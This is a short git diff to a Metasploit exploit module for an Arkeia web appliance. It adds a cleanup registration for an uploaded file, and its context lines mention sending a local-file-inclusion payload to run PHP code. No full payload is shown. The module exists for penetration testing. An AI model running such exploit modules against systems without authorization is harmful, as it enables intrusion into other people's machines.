diff --git a/modules/exploits/unix/webapp/arkeia_upload_exec.rb b/modules/exploits/unix/webapp/arkeia_upload_exec.rb index d1822f4c42..47b3bc2445 100644 --- a/modules/exploits/unix/webapp/arkeia_upload_exec.rb +++ b/modules/exploits/unix/webapp/arkeia_upload_exec.rb @@ -115,6 +115,8 @@ class Metasploit3 < Msf::Exploit::Remote return fail_with(Exploit::Failure::None, "File wasn't uploaded, aborting!") end + register_files_for_cleanup("/tmp/ApplianceUpdate") + print_status("#{peer} - Sending LFI payload to execute PHP code in /tmp/ApplianceUpdate") res = send_request_cgi({ 'method' => 'GET',